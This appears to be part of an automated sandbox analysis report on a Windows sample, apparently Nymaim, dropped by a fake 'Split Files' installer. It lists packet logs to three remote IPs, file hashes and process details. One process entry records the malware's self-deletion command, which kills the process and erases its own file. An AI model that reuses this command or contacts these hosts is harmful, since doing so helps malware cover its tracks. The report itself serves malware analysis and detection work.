                Jan 5, 2023 08:47:09.799809933 CET804970545.139.105.171192.168.2.5
                Jan 5, 2023 08:47:09.799943924 CET4970580192.168.2.545.139.105.171
                Jan 5, 2023 08:47:09.800462008 CET4970580192.168.2.545.139.105.171
                Jan 5, 2023 08:47:09.827680111 CET804970545.139.105.171192.168.2.5
                Jan 5, 2023 08:47:09.836986065 CET804970545.139.105.171192.168.2.5
                Jan 5, 2023 08:47:09.837126970 CET4970580192.168.2.545.139.105.171
                Jan 5, 2023 08:47:09.897756100 CET4970680192.168.2.5107.182.129.235
                Jan 5, 2023 08:47:09.924849987 CET8049706107.182.129.235192.168.2.5
                Jan 5, 2023 08:47:09.925086021 CET4970680192.168.2.5107.182.129.235
                Jan 5, 2023 08:47:09.925610065 CET4970680192.168.2.5107.182.129.235
                Jan 5, 2023 08:47:09.952578068 CET8049706107.182.129.235192.168.2.5
                Jan 5, 2023 08:47:09.952980042 CET8049706107.182.129.235192.168.2.5
                Jan 5, 2023 08:47:09.953092098 CET4970680192.168.2.5107.182.129.235
                Jan 5, 2023 08:47:09.990287066 CET4970680192.168.2.5107.182.129.235
                Jan 5, 2023 08:47:10.017482042 CET8049706107.182.129.235192.168.2.5
                Jan 5, 2023 08:47:10.017687082 CET8049706107.182.129.235192.168.2.5
                Jan 5, 2023 08:47:10.017736912 CET8049706107.182.129.235192.168.2.5
                Jan 5, 2023 08:47:10.017781973 CET8049706107.182.129.235192.168.2.5
                Jan 5, 2023 08:47:10.017790079 CET4970680192.168.2.5107.182.129.235
                Jan 5, 2023 08:47:10.017816067 CET8049706107.182.129.235192.168.2.5
                Jan 5, 2023 08:47:10.017849922 CET8049706107.182.129.235192.168.2.5
                Jan 5, 2023 08:47:10.017884970 CET8049706107.182.129.235192.168.2.5
                Jan 5, 2023 08:47:10.017935991 CET8049706107.182.129.235192.168.2.5
                Jan 5, 2023 08:47:10.017944098 CET4970680192.168.2.5107.182.129.235
                Jan 5, 2023 08:47:10.017982960 CET4970680192.168.2.5107.182.129.235
                Jan 5, 2023 08:47:10.017983913 CET8049706107.182.129.235192.168.2.5
                Jan 5, 2023 08:47:10.018007994 CET4970680192.168.2.5107.182.129.235
                Jan 5, 2023 08:47:10.018030882 CET4970680192.168.2.5107.182.129.235
                Jan 5, 2023 08:47:10.018032074 CET8049706107.182.129.235192.168.2.5
                Jan 5, 2023 08:47:10.018080950 CET8049706107.182.129.235192.168.2.5
                Jan 5, 2023 08:47:10.018090963 CET4970680192.168.2.5107.182.129.235
                Jan 5, 2023 08:47:10.018136024 CET4970680192.168.2.5107.182.129.235
                Jan 5, 2023 08:47:10.045037031 CET8049706107.182.129.235192.168.2.5
                Jan 5, 2023 08:47:10.045104027 CET8049706107.182.129.235192.168.2.5
                Jan 5, 2023 08:47:10.045137882 CET4970680192.168.2.5107.182.129.235
                Jan 5, 2023 08:47:10.045152903 CET8049706107.182.129.235192.168.2.5
                Jan 5, 2023 08:47:10.045172930 CET4970680192.168.2.5107.182.129.235
                Jan 5, 2023 08:47:10.045201063 CET8049706107.182.129.235192.168.2.5
                Jan 5, 2023 08:47:10.045212984 CET4970680192.168.2.5107.182.129.235
                Jan 5, 2023 08:47:10.045250893 CET8049706107.182.129.235192.168.2.5
                Jan 5, 2023 08:47:10.045254946 CET4970680192.168.2.5107.182.129.235
                Jan 5, 2023 08:47:10.045298100 CET8049706107.182.129.235192.168.2.5
                Jan 5, 2023 08:47:10.045305014 CET4970680192.168.2.5107.182.129.235
                Jan 5, 2023 08:47:10.045345068 CET8049706107.182.129.235192.168.2.5
                Jan 5, 2023 08:47:10.045346975 CET4970680192.168.2.5107.182.129.235
                Jan 5, 2023 08:47:10.045392990 CET8049706107.182.129.235192.168.2.5
                Jan 5, 2023 08:47:10.045394897 CET4970680192.168.2.5107.182.129.235
                Jan 5, 2023 08:47:10.045439959 CET4970680192.168.2.5107.182.129.235
                Jan 5, 2023 08:47:10.045439959 CET8049706107.182.129.235192.168.2.5
                Jan 5, 2023 08:47:10.045488119 CET8049706107.182.129.235192.168.2.5
                Jan 5, 2023 08:47:10.045490026 CET4970680192.168.2.5107.182.129.235
                Jan 5, 2023 08:47:10.045533895 CET8049706107.182.129.235192.168.2.5
                Jan 5, 2023 08:47:10.045536995 CET4970680192.168.2.5107.182.129.235
                Jan 5, 2023 08:47:10.045581102 CET8049706107.182.129.235192.168.2.5
                Jan 5, 2023 08:47:10.045583010 CET4970680192.168.2.5107.182.129.235
                Jan 5, 2023 08:47:10.045628071 CET4970680192.168.2.5107.182.129.235
                Jan 5, 2023 08:47:10.045628071 CET8049706107.182.129.235192.168.2.5
                Jan 5, 2023 08:47:10.045677900 CET8049706107.182.129.235192.168.2.5
                Jan 5, 2023 08:47:10.045680046 CET4970680192.168.2.5107.182.129.235
                Jan 5, 2023 08:47:10.045723915 CET8049706107.182.129.235192.168.2.5
                Jan 5, 2023 08:47:10.045728922 CET4970680192.168.2.5107.182.129.235
                Jan 5, 2023 08:47:10.045772076 CET8049706107.182.129.235192.168.2.5
                Jan 5, 2023 08:47:10.045772076 CET4970680192.168.2.5107.182.129.235
                Jan 5, 2023 08:47:10.045819998 CET8049706107.182.129.235192.168.2.5
                Jan 5, 2023 08:47:10.045825005 CET4970680192.168.2.5107.182.129.235
                Jan 5, 2023 08:47:10.045865059 CET8049706107.182.129.235192.168.2.5
                Jan 5, 2023 08:47:10.045869112 CET4970680192.168.2.5107.182.129.235
                Jan 5, 2023 08:47:10.045916080 CET8049706107.182.129.235192.168.2.5
                Jan 5, 2023 08:47:10.045917034 CET4970680192.168.2.5107.182.129.235
                Jan 5, 2023 08:47:10.045964003 CET8049706107.182.129.235192.168.2.5
                Jan 5, 2023 08:47:10.045968056 CET4970680192.168.2.5107.182.129.235
                Jan 5, 2023 08:47:10.046013117 CET4970680192.168.2.5107.182.129.235
                Jan 5, 2023 08:47:10.072890043 CET8049706107.182.129.235192.168.2.5
                Jan 5, 2023 08:47:10.073029995 CET4970680192.168.2.5107.182.129.235
                Jan 5, 2023 08:47:10.073051929 CET8049706107.182.129.235192.168.2.5
                Jan 5, 2023 08:47:10.073117971 CET8049706107.182.129.235192.168.2.5
                Jan 5, 2023 08:47:10.073136091 CET4970680192.168.2.5107.182.129.235
                Jan 5, 2023 08:47:10.073177099 CET8049706107.182.129.235192.168.2.5
                Jan 5, 2023 08:47:10.073189974 CET4970680192.168.2.5107.182.129.235
                Jan 5, 2023 08:47:10.073235989 CET8049706107.182.129.235192.168.2.5
                Jan 5, 2023 08:47:10.073251963 CET4970680192.168.2.5107.182.129.235
                Jan 5, 2023 08:47:10.073295116 CET8049706107.182.129.235192.168.2.5
                Jan 5, 2023 08:47:10.073312998 CET4970680192.168.2.5107.182.129.235
                Jan 5, 2023 08:47:10.073354006 CET4970680192.168.2.5107.182.129.235
                Jan 5, 2023 08:47:10.073359966 CET8049706107.182.129.235192.168.2.5
                Jan 5, 2023 08:47:10.073417902 CET4970680192.168.2.5107.182.129.235
                Jan 5, 2023 08:47:10.073420048 CET8049706107.182.129.235192.168.2.5
                Jan 5, 2023 08:47:10.073477030 CET8049706107.182.129.235192.168.2.5
                Jan 5, 2023 08:47:10.073477030 CET4970680192.168.2.5107.182.129.235
                Jan 5, 2023 08:47:10.073535919 CET8049706107.182.129.235192.168.2.5
                Jan 5, 2023 08:47:10.073538065 CET4970680192.168.2.5107.182.129.235
                Jan 5, 2023 08:47:10.073592901 CET8049706107.182.129.235192.168.2.5
                Jan 5, 2023 08:47:10.073592901 CET4970680192.168.2.5107.182.129.235
                Jan 5, 2023 08:47:10.073649883 CET8049706107.182.129.235192.168.2.5
                Jan 5, 2023 08:47:10.073651075 CET4970680192.168.2.5107.182.129.235
                Jan 5, 2023 08:47:10.073707104 CET4970680192.168.2.5107.182.129.235
                Jan 5, 2023 08:47:10.073707104 CET8049706107.182.129.235192.168.2.5
                Jan 5, 2023 08:47:10.073762894 CET4970680192.168.2.5107.182.129.235
                Jan 5, 2023 08:47:10.073765039 CET8049706107.182.129.235192.168.2.5
                • 45.139.105.171
                • 107.182.129.235
                • 171.22.30.106

                Click to jump to process

                Target ID:1
                Start time:08:47:00
                Start date:05/01/2023
                Path:C:\Users\user\Desktop\file.exe
                Wow64 process (32bit):true
                Commandline:C:\Users\user\Desktop\file.exe
                Imagebase:0x400000
                File size:2094367 bytes
                MD5 hash:E0F8085C7CB8EB9CF1C263BB12CFC6DF
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:low

                Target ID:4
                Start time:08:47:01
                Start date:05/01/2023
                Path:C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp
                Wow64 process (32bit):true
                Commandline:"C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp" /SL4 $902D6 "C:\Users\user\Desktop\file.exe" 1818498 170496
                Imagebase:0x400000
                File size:778752 bytes
                MD5 hash:E8176050192FBB976D70238E3C121F4C
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:moderate

                Target ID:5
                Start time:08:47:04
                Start date:05/01/2023
                Path:C:\Program Files (x86)\Split Files\SplitFiles131.exe
                Wow64 process (32bit):true
                Commandline:"C:\Program Files (x86)\Split Files\SplitFiles131.exe"
                Imagebase:0x400000
                File size:3491315 bytes
                MD5 hash:361518D6CC3C25EEC2DFC1DE82B055B2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Author: Joe Security
                • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000005.00000002.372442187.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000005.00000002.372529330.0000000003340000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                Antivirus matches:
                • Detection: 100%, Joe Sandbox ML
                Reputation:low

                Target ID:6
                Start time:08:47:08
                Start date:05/01/2023
                Path:C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\KN38AzDG.exe
                Wow64 process (32bit):true
                Commandline:
                Imagebase:0x100000
                File size:73728 bytes
                MD5 hash:3FB36CB0B7172E5298D2992D42984D06
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Antivirus matches:
                • Detection: 50%, ReversingLabs
                Reputation:high

                Target ID:7
                Start time:08:47:39
                Start date:05/01/2023
                Path:C:\Windows\SysWOW64\cmd.exe
                Wow64 process (32bit):true
                Commandline:"C:\Windows\System32\cmd.exe" /c taskkill /im "SplitFiles131.exe" /f & erase "C:\Program Files (x86)\Split Files\SplitFiles131.exe" & exit
                Imagebase:0x11d0000
                File size:232960 bytes
                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                Target ID:8
                Start time:08:47:39
                Start date:05/01/2023
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff7fcd70000
                File size:625664 bytes
                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                Target ID:9
                Start time:08:47:39
                Start date:05/01/2023
                Path:C:\Windows\SysWOW64\taskkill.exe
                Wow64 process (32bit):true
                Commandline:taskkill /im "SplitFiles131.exe" /f
                Imagebase:0xf40000
                File size:74752 bytes
                MD5 hash:15E2E0ACD891510C6268CB8899F2A1A1
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                No disassembly